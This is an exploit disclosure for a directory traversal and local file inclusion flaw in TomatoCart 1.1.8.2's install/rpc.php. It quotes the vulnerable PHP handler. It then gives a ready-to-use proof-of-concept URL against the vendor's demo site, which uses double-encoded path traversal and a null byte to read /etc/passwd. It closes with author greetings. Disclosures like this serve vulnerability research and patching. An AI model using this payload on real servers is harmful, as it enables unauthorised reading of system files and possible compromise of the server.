########################################################################################### #Exploit Title: TomatoCart 1.1.8.2 - LFI / Directory Traversal Vulnerability #Product: TomatoCart #Official site: http://www.tomatocart.com/ #Demo : http://demo.tomatocart.com/ #Risk Level: High #Exploit Author: Esac #Last Checked: 18/11/2013 ########################################################################################### +----------+ | OVERVIEW | +----------+ TomatoCart is open source ecommerce solution developed and maintained by a number of 64,000+ users from 50+ countries and regions. It's distributed under the terms of the GNU General Public License (or "GPL"), free to download and share. The community, including project founders and other developers, are supposed to work together on the platform of TomatoCart, contributing features, technical support and services. unfortunatly , Tomatocart suffer from critical vuln that allow attackers step out of the root directory and access files in other directories. As a result, attackers might view restricted files or execute commands, leading to a full compromise of the Web server +-----------------------------------------------------------------------------------+ +-------------------------------------+ | LFI / Directory Traversal Vuln | +-------------------------------------+ Affected file : install/rpc.php ....................................................... if (isset($_GET['action']) && !empty($_GET['action'])) { switch ($_GET['action']) { case 'dbCheck': $db = array('DB_SERVER' => trim(urldecode($_GET['server'])), 'DB_SERVER_USERNAME' => trim(urldecode($_GET['username'])), 'DB_SERVER_PASSWORD' => trim(urldecode($_GET['password'])), 'DB_DATABASE' => trim(urldecode($_GET['name'])), 'DB_DATABASE_CLASS' => trim(urldecode($_GET['class'])) ); $osC_Database = osC_Database::connect($db['DB_SERVER'], $db['DB_SERVER_USERNAME'], $db['DB_SERVER_PASSWORD'], $db['DB_DATABASE_CLASS']); if ($osC_Database->isError() === false) { $osC_Database->selectDatabase($db['DB_DATABASE']); } if ($osC_Database->isError()) { echo '[[0|' . $osC_Database->getError() . ']]'; } else { echo '[[1]]'; } exit; break; ......................................................... +------------------+ | PROOF OF CONCEPT | +------------------+ http://demo.tomatocart.com//install/rpc.php?action=dbCheck&class=..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500.jpg +--------------------------------------------------------------+ Knowledge is not an object , it's a flaw :) Email : esacp4r@gmail.com & s3cpr0@hotmail.com Greetz : White Tarbouch TEAM - Cobra www.Iss4m.ma && www.eternalsec.com/cc ./Issam IEBOUBEN Aka Esac